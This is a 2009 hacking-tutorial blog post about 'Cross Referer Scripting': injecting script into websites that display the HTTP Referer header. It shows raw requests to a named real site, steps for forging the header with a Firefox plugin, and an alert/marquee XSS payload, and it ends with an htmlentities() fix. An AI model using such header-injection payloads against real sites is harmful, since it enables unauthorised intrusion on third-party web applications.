Home » Hacking papers, tutorials

Introduction to XRS Cross Referer Scripting

9 February 2009 52 views No Comment

another way for create xss
similar to the XAS (exploiting header request)
Your Ad Here


Well we will discuss about that here now ..
http://www.cnil.fr/index.php?id=123
GET /index.php?id=123 HTTP/1.1
Host: www.cnil.fr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com/search?q=http%3A%2F%2Fwww.cnil.fr%2Findex.php%3Fid%3D123&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: fe_typo_user=621d0722b0; TestCookieAlone=ok

the referer is used by much webmaster for tracking visitor
it is for that which solutions exists for not the webmaster knows from which site you come
example: http://anonym.to/en.html

We just change the referer by a ‘malicious’ code
because much webmaster dont know or forget this vulnerability

download the firefox plugin: RefControl
available here:
http://www.stardrifter.org/refcontrol/

Your Ad Here

install it, Reboot firefox
got to http://www.cnil.fr/index.php?id=123

in firefox menu: Tools > RefControl Options
click in [Add site]

In site: www.cnil.fr
Action: Custom (and type your favourite alert code)
click in [OK] buton

after click again in [OK] buton
refresh your browser in the cnil.fr page

XRS…
http://www.cnil.fr/index.php?id=123
GET /index.php?id=123 HTTP/1.1
Host: www.cnil.fr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: fe_typo_user=621d0722b0; TestCookieAlone=ok
Referer: '"></title><script>alert(1337)</script>><marquee><h1>XSS by Xylitol</h1></marquee>

for secure it, just use htmlentities() in your function for show the referer

#Credits:
xssing, sla.ckers, 50-1337, xssed, security-sh3ll peoples
and all hardworking sceners in the scene

Share and Enjoy:
(No Ratings Yet)
 Loading ...

Leave your response!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.

You can use these tags:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

This is a Gravatar-enabled weblog. To get your own globally-recognized-avatar, please register at Gravatar.